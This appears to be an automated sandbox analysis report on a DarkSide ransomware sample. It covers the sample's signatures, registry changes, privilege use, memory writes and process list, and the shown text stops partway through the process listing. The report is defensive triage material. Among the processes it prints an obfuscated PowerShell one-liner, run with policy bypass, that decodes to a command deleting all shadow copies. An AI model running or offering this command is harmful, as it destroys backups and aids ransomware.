Malware Analysis Report

2024-10-16 03:30

Sample ID 220125-3cwwaahgd4
Target mal.exe
SHA256 2c7d10f64dc39ea9bd6f18d9d1e1204f0c62324e8da148354d557bba17e3c615
Tags
darkside ransomware spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2c7d10f64dc39ea9bd6f18d9d1e1204f0c62324e8da148354d557bba17e3c615

Threat Level: Known bad

The file mal.exe was found to be: Known bad.

Malicious Activity Summary

darkside ransomware spyware stealer

DarkSide

Modifies extensions of user files

Reads user/profile data of web browsers

Sets desktop wallpaper using registry

Enumerates system info in registry

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Modifies Control Panel

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-25 23:22

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-25 23:22

Reported

2022-01-25 23:27

Platform

win7-en-20211208

Max time kernel

189s

Max time network

194s

Command Line

"C:\Users\Admin\AppData\Local\Temp\mal.exe"

Signatures

DarkSide

ransomware darkside

Reads user/profile data of web browsers

spyware stealer

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.5bede5a3 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.5bede5a3\ = "5bede5a3" C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3\DefaultIcon C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3 C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\5bede5a3\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\5bede5a3.ico" C:\Users\Admin\AppData\Local\Temp\mal.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\mal.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 968 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\mal.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 968 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\mal.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 968 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\mal.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 968 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\mal.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1712 wrote to memory of 1180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 1180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 1180 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 744 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 1308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 1308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 1308 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 1380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 1380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 1380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 1380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 1380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 1380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 1380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 1380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 1380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 1380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 1380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 1380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1712 wrote to memory of 1380 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Users\Admin\AppData\Local\Temp\mal.exe

"C:\Users\Admin\AppData\Local\Temp\mal.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7feeeaf4f50,0x7feeeaf4f60,0x7feeeaf4f70

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1048 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1356 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1696 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1976 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1968 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3012 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2368 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3940 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3980 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3852 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3764 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3652 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3676 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3700 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4164 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3800 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4216 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4000 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=764 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3220 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3340 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2924 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1016,17164903782742409304,16420728453414700574,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

